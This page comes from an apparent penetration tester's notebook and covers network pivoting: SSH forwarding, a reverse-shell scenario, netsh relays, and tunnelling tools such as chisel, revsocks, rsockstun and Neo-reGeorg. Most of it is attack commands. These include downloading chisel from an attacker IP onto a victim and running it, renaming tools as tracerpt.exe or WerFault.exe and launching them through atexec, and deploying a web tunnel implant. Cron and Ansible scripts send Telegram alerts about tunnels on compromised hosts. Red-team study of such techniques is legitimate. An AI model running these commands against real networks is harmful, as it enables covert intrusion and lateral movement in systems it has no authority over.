Pentester's Promiscuous Notebook
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2
      • Covenant
      • Empire
      • Havoc
      • Meterpreter
      • PoshC2
      • Sliver
    • Infrastructure
      • AD
        • ACL Abuse
        • AD CS Abuse
          • dNSHostName Spoofing (Certifried)
          • ESC1
          • ESC4
          • ESC8
          • ESC15
          • Golden Certificate
          • Pass-the-Certificate
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasion
          • .NET Assembly
            • .NET Config Loader
            • .NET Dynamic API Invocation
            • .NET In-Memory Assembly
            • .NET Reflective Assembly
          • AMSI Bypass
          • Application Whitelist Bypass
          • AppLocker Bypass
          • BYOVD
          • CLM Bypass
          • Defender
          • ETW Block
          • Execution Policy Bypass
          • Mimikatz
          • UAC Bypass
        • Authentication Coercion
        • BadSuccessor
        • Credentials Harvesting
          • From Memory
            • lsass.exe
            • svchost.exe
          • Credential Phishing
          • DCSync
          • DPAPI
          • KeePass
          • Linux
          • LSA
          • NetSync
          • NPLogonNotify
          • NTDS
          • Password Filter
          • RDP
          • SAM
          • SSH Clients
          • SSPI
        • Discovery
        • DnsAdmins
        • Dominance
        • GPO Abuse
        • Kerberos
          • Delegation Abuse
            • Constrained
            • Resource-based Constrained
            • Unconstrained
          • Kerberos Relay
          • Roasting
        • Key Credentials Abuse
        • LAPS
        • Lateral Movement
          • DCOM
          • Overpass-the-Hash
          • Pass-the-Hash
          • Pass-the-Ticket
          • RDP
          • RPC
          • RunAs
          • SMB
          • SPN-jacking
          • WinRM / PSRemoting
          • WMI
        • LDAP
        • NTLM
          • NTLM Relay
          • NTLMv1 Downgrade
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abuse
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilege
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure AD
        • On-Prem ↔ Cloud
          • Cloud → On-Prem
          • On-Prem → Cloud
        • PRT Abuse
      • DevOps
        • Ansible
        • Artifactory
        • Atlassian
        • Containerization / Orchestration
        • GitLab
        • HashiCorp Vault
        • Jenkins
        • VS Code
        • Zabbix
      • DBMS
        • FireBird
        • MS SQL
        • MySQL / MariaDB
        • Oracle
        • Redis
        • SQLite
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networks
        • L2
          • ARP Spoofing
          • DHCPv6 Spoofing
          • LLMNR / NBNS Poisoning
          • SNACs Abuse
          • VLAN Hopping
        • NAC Bypass
        • Scanning
        • SIP / VoIP
        • Sniff Traffic
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINT
      • Shodan
    • Password Brute Force
      • Generate Wordlists
    • Perimeter
      • 1C
      • ADFS
      • Cisco
      • DNS
      • Exchange
      • Information Gathering
      • IPSec
      • Java RMI
      • Log4j / Log4Shell
      • Lync & Skype for Business
      • NTP
      • Outlook
      • OWA
      • SharePoint
      • SMTP
      • SSH
      • Subdomain Takeover
    • Shells
      • Reverse Shells
      • Web Shells
    • Web
      • 2FA Bypass
      • LFI / RFI
      • SOP / CORS
      • SQLi
      • WAF
      • WordPress
      • XSS
    • Wi-Fi
      • WPA / WPA2
        • Enterprise
        • Personal
  • ⚔️Red Team
    • Basics
    • Cobalt Strike
      • UDRL
    • Infrastructure
    • MalDev
      • API Hashing
      • API Hooking
      • BOF / COFF
      • CFG
      • Code Injection
        • DLL Injectors
        • Process Hollowing
        • Process Injectors
        • Shellcode Runners
      • DLL Hijacking
      • Golang
      • Kernel Mode
      • PIC / Shellcode
      • Nim
      • Sandbox Evasion
      • Syscalls
      • Windows API
    • SE
      • Phishing
        • HTML Smuggling
        • MS Office
        • Rogue RDP
  • 🐞Exploit Dev
    • BOF
      • OSCP BOF
      • OSED SEH Overflow
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linux
      • Kali
    • Networking
      • DHCP Server & Linux Hotspot
      • Quick Configurations
      • Routing
      • WireGuard
    • Virtualization
      • Docker
      • Hyper-V
      • VirtualBox
      • VMWare
    • Windows
Powered by GitBook
On this page
  • SSH
  • Local vs Remote Port Forwarding
  • Remote Dynamic Forwarding
  • L2 VPN over SSH
  • SOCKS over Hardened SSH
  • netsh / NetFirewallRule
  • Rules
  • Relay
  • TCP over RDP
  • xfreerdp + rdp2tcp
  • TCP over SMB
  • Tools
  • proxychains4 (proxychains-ng)
  • graftcp
  • sshuttle
  • chisel
  • revsocks
  • rsockstun
  • resocks
  • (Neo-)reGeorg
  • ssf
  • Services
  • Dev Tunnels
  • Cloudflare Tunnels
  1. Pentest
  2. Infrastructure

Pivoting

Last updated 1 month ago

Check if connections are allowed at a certain port (alternative to and ):

nc.ps1
# Test-NetConnection -ComputerName 10.10.13.37 -Port 4444
$port = $args[0]
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener $endpoint
$listener.Start()
Write-Host "Listening on port $port"
while ($true)
{
    $client = $listener.AcceptTcpClient()
    Write-Host "A client has connected"
    $client.Close()
}

Check if the machine can reach specific remote port when Test-NetConnection is not available (, ):

$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'powershell (New-Object System.Net.Sockets.TcpClient("192.168.2.22", 445)).Connected' | grep -ai True

Using :

Cmd > PortQry.exe –n <IP> -p tcp/udp/both -e <PORT> -v

SSH

Local vs Remote Port Forwarding

A cheatsheet for SSH Local/Remote Forwarding command syntax:

  • -L 1111:127.0.0.1:2222: the traffic is forwarded from SSH client via SSH server, so 1111 is listening on client-side and traffic is sent to 2222 on server-side.

  • -R 2222:127.0.0.1:1111: the traffic is forwarded from SSH server via SSH client, so 2222 is listening on server-side and traffic is sent to 1111 on client-side.

Consider the following example. An attacker has root privileges on Pivot1. He creates the first SSH tunnel (remote port forwarding) to interact with a vulnerable web server on Pivot2. Then he exploits the vulnerability on Pivot2 and triggers it to connect back to Attacker via a reverse-shell (firewall is active, so he needs to pivot through port 443, which is allowed). After that the attacker performs PE on Pivot2 and gets root. Then he creates another tunnel (local port forwarding) over the first one to SSH into Pivot2 from Attacker. Finally, he forwards port 80 over two existing hops to reach another vulnerable web server on Victim.

  Attacker (10.10.13.37)                                                    Pivot1 (10.1.1.1)                                  Pivot2 (10.2.2.2)                   Victim (10.3.3.3)
┌──────────────────────────────────────────────────────────────────────┐  ┌───────────────────────────────────────────────┐  ┌────────────────────────────────┐  ┌───────────────────┐
│                                                                   22 │  │                                               │  │                                │  │                   │
│ 1.  ssh -R 443:127.0.0.1:9001 root@10.1.1.1 ------------------------------► 10.1.1.1:22                                 │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 2.                                                                   │  │   Listens 0.0.0.0:443 ("GatewayPorts yes")    │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 3.                                                                   │  │   ~C ssh> -L 9002:10.2.2.2:80                 │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 4.  Listens 127.0.0.1:9002 (to interact with web server 10.2.2.2:80) │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 5.  shellpop -H 10.2.2.2 -P 443 --reverse --number 8 --base64        │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                9001 over 10.1.1.1:22 │  │                                           443 │  │                                │  │                   │
│ 6.  rlwrap nc -lvnp 9001 ◄--- 127.0.0.1:9001 ◄----------------------------- 0.0.0.0:443 ◄───────────────────────────────┼──┼── Web server 10.2.2.2:80       │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 7.  Got shell from 10.2.2.2                                          │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 8.  Got root on 10.2.2.2                                             │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                                      │  │   ~C ssh> -L 9003:127.0.0.1:1337              │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 9.  Listens 127.0.0.1:9003                                           │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                                      │  │                                            22 │  │                                │  │                   │
│                                                                      │  │   ssh -L 1337:127.0.0.1:22 root@10.2.2.2 ----------► 10.2.2.2:22                  │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                                      │  │   Listens 127.0.0.1:1337                      │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                1337 over 10.1.1.1:22 │  │                           22 over 10.2.2.2:22 │  │                                │  │                   │
│ 10. ssh root@127.0.0.1 -p 9003 -------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22                 │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │   ~C ssh> -L 9004:10.3.3.3:80  │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│ 11. Listens 127.0.0.1:9004                                           │  │                                               │  │                                │  │                   │
│                                                                      │  │                                               │  │                                │  │                   │
│                                                1337 over 10.1.1.1:22 │  │                           22 over 10.2.2.2:22 │  │                                │  │                   │
│ 12. curl http://127.0.0.1:9004/ ------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 ────────────────┼──┼─► 10.3.3.3:80     │
│                                                                      │  │                                               │  │                                │  │                   │
└──────────────────────────────────────────────────────────────────────┘  └───────────────────────────────────────────────┘  └────────────────────────────────┘  └───────────────────┘

Notes:

  • 1 For SSH server to listen at 0.0.0.0 instead of 127.0.0.1, the GatewayPorts yes must be set in /etc/ssh/sshd_config.

  • 1 With SSH (or Chisel, for example) server running on the Attacker the same can be achieved by doing local port forwarding instead of remote.

snovvcrash@attacker:~$ ./chisel server -p 8000
root@pivot1:# nohup ./chisel client 10.10.13.37:8000 443:127.0.0.1:9001 &
root@pivot1:# netstat -tulpan | grep 443
tcp6       0      0 :::443                 :::*                    LISTEN      18406/./chisel
snovvcrash@attacker:~$ rlwrap nc -lvnp 9001

Let's say we're doing a Remote Port Forwarding via SSH (with GatewayPorts yes) through ProxyChains like this:

$ proxychains ssh -R 80:127.0.0.1:8080 root@192.168.1.11

Then it's crucial to make sure that local connections are excluded from ProxyChains interception via the localnet 127.0.0.0/255.0.0.0 option in proxychains.conf. Otherwise, traffic redirection from server's 192.168.1.11:80 to client's 127.0.0.1:8080 are captured by ProxyChains and never reach the client!

Remote Dynamic Forwarding

  • Attacker's IP: 10.10.13.37

  • Victims's IP: 10.10.13.38

An example how to safely set remote dynamic port forwarding (SOCKS) with a builin SSH client.

Generate a dummy SSH key on Victim:

alice@victim:~$ ssh-keygen -f dummy_key -t ed25519 -q -N ""

Add dummy_key.pub contents to authorized_keys on Attacker with the following options:

snovvcrash@attacker:~$ vi ~/.ssh/authorized_keys
from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB>

Connect to Attacker's SSH server from Victim:

alice@victim:~$ ssh -fN -R 1080 -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i dummy_key snovvcrash@10.10.13.37

L2 VPN over SSH

Allow tunneling in SSH server config on Victim:

root@victim:~$ sudo vi /etc/ssh/sshd_config
...uncomment "PermitTunnel = yes"...
root@victim:~$ sudo service sshd restart

Connect to Victim building a Ethernet tunnel:

snovvcrash@attacker:~$ sudo ssh -oTunnel=ethernet -w0:0 root@192.168.1.11

Enable tap interfaces on both ends:

root@victim:~$ sudo ip link set tap0 up
snovvcrash@attacker:~$ sudo ip link set tap0 up

Put Victim's interface and tap into bridge:

root@victim:~$ sudo ip link add br0 type bridge
root@victim:~$ sudo ip link set eth0 master br0
root@victim:~$ sudo ip link set tap0 master br0
root@victim:~$ sudo ip link set br0 up

Get an IP address for tap on Attacker:

snovvcrash@attacker:~$ sudo dhclient -v tap0

SOCKS over Hardened SSH

With AllowTcpForwarding set to no it's also possible to establish a SOCKS connection through active SSH connection:

snovvcrash@attacker:~$ cat tunnel.sh
ssh alice@victim "./socat TCP-LISTEN:2222,reuseaddr STDIO"
snovvcrash@attacker:~$ socat TCP:localhost:22 EXEC:./tunnel.sh
alive@victim:~$ ssh -R 1080 -p 2222 snovvcrash@attacker

netsh / NetFirewallRule

Rules

Allow inbound traffic flow on port 5986/TCP:

Cmd > netsh advfirewall firewall add rule name="Windows Remote Management (HTTPS-In)" dir=in action=allow protocol=TCP localport=5986
Cmd > netsh advfirewall firewall delete rule name="Windows Remote Management (HTTPS-In)"
PS > New-NetFirewallRule -DisplayName "Windows Remote Management (HTTPS-In)" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 5986
PS > Remove-NetFirewallRule -DisplayName "Windows Remote Management (HTTPS-In)"

Relay

Add a relay between two machines (need to be local admin).

Make any traffic hitting port 8443 on 0.0.0.0 to be redirected to 10.10.13.37 on port 443:

Cmd > netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8443 connectaddress=10.10.13.37 connectport=443 protocol=tcp

Show active relays:

Cmd > netsh interface portproxy show v4tov4

Remove a relay:

Cmd > netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8443

TCP over RDP

xfreerdp + rdp2tcp

$ xfreerdp /cert:ignore [/client-hostname:WORKGROUP] /u:snovvcrash /p:'Passw0rd!' [/d:megacorp.local] [/g:RDS-GATEWAY.megacorp.local] /v:PC01.megacorp.local /dynamic-resolution +clipboard [/timeout:25000] [-sec-nla] [/drive:share,/home/snovvcrash/share] [/rdp2tcp:/home/snovvcrash/tools/rdp-tunnel/rdp2tcp]

Reverse local port 9002 (on Victim) to local port 9001 on Attacker (good for reverse shells):

$ python rdp2tcp.py add reverse 127.0.0.1 9001 127.0.0.1 9002

Forward local port 9001 (on Attacker) to local port 9002 on Victim (good for bind shells):

$ python rdp2tcp.py add forward 127.0.0.1 9001 127.0.0.1 9002

Reverse tunnel web access via SOCKS proxy:

$ python rdp2tcp.py add socks5 127.0.0.1 1080
$ python rdp2tcp.py add reverse 127.0.0.1 1080 127.0.0.1 9003

TCP over SMB

Tools

proxychains4 (proxychains-ng)

Install:

$ git clone https://github.com/rofl0r/proxychains-ng ~/tools/proxychains-ng && cd ~/tools/proxychains-ng
$ ./configure --prefix=/usr --sysconfdir=/etc
$ make
$ sudo make install
$ sudo make install-config
+ edit /etc/proxychains.conf

graftcp

sshuttle

$ sshuttle -vr snovvcrash@10.10.13.37 192.168.1.0/24 -e "sshpass -p 'Passw0rd!' ssh"
$ sshuttle -vr snovvcrash@10.10.13.37 192.168.1.0/24 -e "ssh -i ./key"

chisel

  • Attacker's IP: 10.10.13.37

  • Victims's IP: 10.10.13.38

Reverse local port 1111 (on Victim) to local port 2222 (on Attacker):

$ ./chisel server -p 8000 -v --reverse
PS > (New-Object Net.WebClient).DownloadFile("http://10.10.13.37/chisel.exe", "$env:userprofile\music\chisel.exe")
PS > Get-FileHash -Alg md5 "$env:userprofile\music\chisel.exe"
PS > Start-Process -NoNewWindow -FilePath "$env:userprofile\music\chisel.exe" -ArgumentList "client 10.10.13.37:8000 R:127.0.0.1:2222:127.0.0.1:1111"
or
Cmd > [cmd /c] start "" /b chisel.exe ...

Socks5 proxy in server mode:

alice@victim:~$ nohup ./chisel server -p 8000 --socks5 &
snovvcrash@kali:~$ ./chisel client 10.10.13.38:8000 [127.0.0.1:1080:]socks

Socks5 proxy in server mode when direct connection to Victim is not available (not relevant as Chisel supports socks5 in client mode now):

snovvcrash@kali:~$ ./chisel server -p 8000 --reverse
alice@victim:~$ nohup ./chisel client 10.10.13.37:8000 R:127.0.0.1:8001:127.0.0.1:8002 &
alice@victim:~$ nohup ./chisel server -v -p 8002 --socks5 &
snovvcrash@kali:~$ ./chisel client 127.0.0.1:8001 [127.0.0.1:1080:]socks

Socks5 proxy in client mode:

snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash:'Passw0rd!']
alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks &

Quicky:

$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
$ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks
$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'

Double SOCKS Proxy

snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5
alice@pivot1:~$ nohup ./chisel client 10.10.13.37:8000 R:socks &
alice@pivot1:~$ nohup ./chisel server -p 8000 --reverse --socks5 &
bob@pivot2:~$ nohup ./chisel client 192.168.1.11:8000 R:socks &
snovvcrash@kali:~$ cp /etc/proxychains4.conf .
snovvcrash@kali:~$ echo 'socks5 127.0.0.1 1080' >> proxychains4.conf
snovvcrash@kali:~$ echo 'socks5 127.0.0.1 1080' >> proxychains4.conf
snovvcrash@kali:~$ proxychains4 -f ./proxychains4.conf nmap -Pn -sT 192.168.3.33 -p445

SharpChisel

revsocks

snovvcrash@kali:~$ ./revsocks -listen :8000 -socks 127.0.0.1:1080 -pass 'Passw0rd!'
alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!'

rsockstun

$ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes
$ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!'

Quicky:

$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
Or get proc image first to make sure you're killing the right proc and kill by pid -- 'wmic process where "name='"'"'WerFault.exe'"'"'" get ProcessID, ExecutablePath'

PowerShell

resocks

$ git clone https://github.com/RedTeamPentesting/resocks ~/tools/resocks && cd ~/tools/resocks && go build
$ export RESOCKS_KEY=`./resocks generate`
$ CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -H windowsgui -X main.defaultConnectBackAddress=10.10.13.37 -X main.defaultConnectionKey=$RESOCKS_KEY"
$ ./resocks listen

(Neo-)reGeorg

Generate a tunnel implant and copy it to the Victim web server from ./neoreg_servers/tunnel*:

$ python neoreg.py generate -k 'Passw0rd!'

Connect to the implant (.aspx, for example):

$ python neoreg.py -k 'Passw0rd!' -u http://web01.megacorp.local/tunnel.aspx -l 0.0.0.0 -p 1337 [--skip]

ssf

Map shells to users:

for port in `netstat -tulpan | grep 127.0.0.1 | grep ssfd | awk '{print $4}' | awk -F: '{print $2}'`; do echo "127.0.0.1:$port"; (echo qwinsta | nc 127.0.0.1 $port & sleep 1 && kill -s INT $!) 2>/dev/null | grep -a console; done

Telegram alers:

watchdog_new_sockets.sh
#!/bin/bash
# * * * * * /tmp/watchdog_new_sockets.sh ssfd
TOOL=$1
if [ "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -gt 1 ]; then
    MESSAGE="new $TOOL tunnel spawned at $(curl -s ifconfig.me)"
    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null
fi
watchdog_live_sockets.sh
#!/bin/bash
# * * * * * /tmp/watchdog_live_sockets.sh ssfd PC01
TOOL=$1
LABEL=$2
if [ ! -f /tmp/.ignore_sockets_watchdog -a "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -lt 3 ]; then
    MESSAGE="$TOOL tunnel died at $(curl -s ifconfig.me) ($LABEL)"
    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null
    touch /tmp/.ignore_sockets_watchdog
fi
watchdog_live_sockets.yml
# ansible_run() { ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -u user --private-key ~/.ssh/id_ed25519 -i "$1," "${@:2}" }
- name: Install Sockets Watchdog with TG Notifications
  hosts: all
  vars:
    watchdog_path: "/home/user/tools/watchdog_live_sockets.sh"

  pre_tasks:
  - name: Check Input Arguments
    fail:
      msg: >-
        Usage: ansible_run 127.0.0.1 watchdog_live_sockets.yml -e "tool=ssfd" -e "label=PC01" -e "token=<TOKEN>" -e "chat_id=<CHAT_ID>"
    when: tool is undefined or label is undefined or token is undefined or chat_id is undefined
    run_once: true

  - name: Upload Watchdog Script
    copy:
      dest: "{{ watchdog_path }}"
      content: |
        #!/bin/bash
        TOOL=$1
        LABEL=$2
        TOKEN=$3
        CHAT_ID=$4
        if [ ! -f /tmp/.ignore_sockets_watchdog -a "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -lt 3 ]; then
            MESSAGE="$TOOL tunnel died at $(curl -s ifconfig.me) ($LABEL)"
            curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null
            touch /tmp/.ignore_sockets_watchdog
        fi
      mode: 0755

  - name: Add Cron Job
    cron:
      name: "{{ tool }} tunnels watchdog"
      minute: "*"
      job: "{{ watchdog_path }} {{ tool }} {{ label }} {{ token }} {{ chat_id }}"

Services

Dev Tunnels

$ curl -sL https://aka.ms/DevTunnelCliInstall | bash
$ ssh -L 0.0.0.0:443:localhost:8443 -N teamserver
$ devtunnel host -p 443 --allow-anonymous --protocol https

Don't forget to set Cookie: *tunnel_phishing_protection=xxxxyyyy.euw

Cloudflare Tunnels

⚒️
PayloadsAllTheThings/Network Pivoting Techniques.md
https://www.programmersought.com/article/93593867459/
https://xakep.ru/2020/09/08/windows-pivoting/
nc.exe
powercat.ps1
1
2
PortQryV2
https://habr.com/ru/post/331348/
https://iximiuz.com/en/posts/ssh-tunnels/
https://www.blackhillsinfosec.com/forwarding-traffic-through-ssh/
[YouTube] HTB Business CTF 2022: Dirty Money - The Day Before
[YouTube] HTB Business CTF 2022: Dirty Money - The Day Before
https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/
https://github.com/V-E-O/rdp2tcp
https://github.com/NotMedic/rdp-tunnel
https://serverfault.com/a/361806/554483
https://github.com/lexfo/rpc2socks
https://habr.com/ru/articles/460659/
https://github.com/mis-team/rsockspipe
https://tishina.in/ops/sliver-forward-pivoting
https://github.com/zimnyaa/smbsocks/
https://github.com/ginuerzh/gost
https://github.com/sysdream/ligolo
https://github.com/nicocha30/ligolo-ng
https://github.com/friedrich/hans
https://github.com/rofl0r/proxychains-ng
https://github.com/hmgle/graftcp
https://sysdig.com/blog/bypassing-network-detection-with-graftcp/
https://github.com/sshuttle/sshuttle
https://anubissec.github.io/How-To-Pivot-Into-Target-Network-With-SSH/#
https://github.com/jpillora/chisel/releases
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel
https://gist.github.com/freshwind2004/c827e742285cdb9542403ff021486bb0
https://github.com/zimnyaa/grpcssh
https://github.com/shantanu561993/SharpChisel
https://github.com/latortuga71/SharpChisel-NG
https://medium.com/@shantanukhande/red-team-how-to-embed-golang-tools-in-c-e269bf33876a
https://github.com/m3rcer/Chisel-Strike
https://github.com/kost/revsocks
https://github.com/llkat/rsockstun
https://habr.com/ru/articles/453870/
https://habr.com/ru/articles/453970/
https://habr.com/ru/articles/454254/
https://github.com/mis-team/rsockstun
https://github.com/RedTeamPentesting/resocks
https://github.com/sensepost/reGeorg
https://github.com/L-codes/Neo-reGeorg
https://github.com/securesocketfunneling/ssf
https://www.syonsecurity.com/post/devtunnels-for-c2
https://labs.jumpsec.com/putting-the-c2-in-c2loudflare/
https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/
garble
HTB{ Reddish }snovvcrash@gh-pages:~$ _
Double SOCKS Proxy Scheme
Logo